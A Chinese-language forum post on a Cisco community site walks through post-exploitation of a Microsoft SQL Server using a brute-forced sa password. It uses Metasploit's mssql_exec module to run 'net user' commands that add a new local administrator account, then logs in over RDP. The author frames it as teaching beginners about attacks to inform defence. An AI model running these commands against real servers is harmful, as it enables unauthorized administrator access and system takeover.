请选择 进入手机版 | 继续访问电脑版

设为首页 收藏本站
思科社区 关注
思科社区

  思科 CCO 登录 推荐
 找回密码
 立即注册

搜索
热搜: 邮件服务器
查看: 288|回复: 1

【原创】浅谈一个MSSQL攻击后的提权攻击

[复制链接]
发表于 2019-3-6 23:46:54 | 显示全部楼层 |阅读模式


看图片我们还是用到KALI 啊,前面一篇我们聊过了用爆破已经获取了MSSQL 的登录密码,那么,怎么样可以提权数据库底层的操作系统呢?


第一步:调用mssql_exec   工具,这东西,大家可以百度一下,比较有意思的说

show options 后培训必要的参数,这里的sa 密码是我们前面爆破出来的,填写进去
msf > use auxiliary/admin/mssql/mssql_exec         调用exec工具
set PASSWORD 12345678         :设置前期攻击爆出的密码
set cmd cmd.exe /c net user
set rhosts 10.10.100.139
set threads 10
set USERNAME sa



配置好后run运行
run


run 出来的效果是可以调用存储过程


第二步: 创建超级管理员

攻击增加管理员
set cmd cmd.exe /c net user XXtest test@123/add&net localgroup administrators XXtest /add
run

第三步:调用RDP 工具去测试登录目标系统,
通过Linux rdesktop   RDP 连接目标DB  host


看截图,已经能够登录上目标系统了,而且是超级管理员,提权成功


熟知攻击套路,用心配置安全设备防护措施,希望对菜鸟有点点帮助,大神们跳过!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
  • 1
  • 2
  • 3
  • 4
  • 5
  • 1
  • 2
  • 3
  • 4
  • 5
平均得分5 (2 评价)
发表于 2019-3-8 21:35:56 | 显示全部楼层
谢谢分享!
  • 1
  • 2
  • 3
  • 4
  • 5
  • 1
  • 2
  • 3
  • 4
  • 5
平均得分0 (0 评价)
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver | 思科社区  

GMT+8, 2019-3-23 13:37 , Processed in 0.088277 second(s), 35 queries .

京ICP备09041801号-187

版权所有 :copyright:1992-2019 思科系统  重要声明 | 保密声明 | 隐私权政策 | 商标 |

快速回复 返回顶部 返回列表